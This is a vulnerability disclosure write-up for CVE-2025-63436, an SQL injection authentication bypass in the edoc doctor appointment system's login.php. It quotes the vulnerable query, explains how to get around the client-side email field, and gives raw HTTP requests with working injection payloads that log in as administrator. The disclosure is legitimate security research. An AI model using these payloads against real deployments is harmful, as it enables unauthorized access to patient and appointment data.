CVE-2025-63436: Authentication Bypass via SQLi on edoc doctor appointment system

# CVE-2025-63436: Authentication Bypass via SQL injection - edoc doctor-appointment-system Link : https://github.com/HashenUdara/edoc-doctor-appointment-system ## Identification & Exploitation From reviewing the source code I identified this from `login.php`: ![image](https://hackmd.io/_uploads/SyeSJJeQ8ll.png) ![image](https://hackmd.io/_uploads/BkB96yXUeg.png) First we have to bypass this restriction (it's only a client-side restriction we can simply open devtools and change the type of data passed on input from email to text) ![image](https://hackmd.io/_uploads/S1DxAkmUex.png) initially it was email we changed it to text allowing us to send any input : ![image](https://hackmd.io/_uploads/BJuXR17Ueg.png) ```http POST /login.php HTTP/1.1 Host: localhost:8083 Content-Length: 102 Accept-Language: en-US,en;q=0.9 Origin: http://localhost:8083 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://localhost:8083/login.php Accept-Encoding: gzip, deflate, br Cookie: username=jojo; session=1a7c29922727a41737aa95b11c3efb960e5ee8afb367aa21a6e5b1d5775ab92b; PHPSESSID=ccfa7791ebb5302c3aeac5b7a505db62 Connection: keep-alive useremail=admin%40edoc.com%27+or+1%3D1+limit+1+--&userpassword=admin%40edoc.com%27+or+1%3D1+limit+1+-- ``` We receive a blank page but checking the error output we get, shows that this is 100% SQL injection! ![image](https://hackmd.io/_uploads/SJa5RkXLgl.png) But that didn't work, because the logic is to first check if the user exists and what type of user it is: ```php $result= $database->query("select * from webuser where email='$email'"); ``` Now with the payload `' OR '1'='1' limit 1 #--` I was able to bypass authentication completely and login as the administrator! ![image](https://hackmd.io/_uploads/SJH2Xe7Lgl.png) Below is a raw HTTP request: ```http POST /login.php?action=logout HTTP/1.1 Host: localhost:8083 Content-Length: 66 Origin: http://localhost:8083 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Connection: keep-alive useremail=%27+OR+%271%27%3D%271%27+limit+1+%23--&userpassword=test ```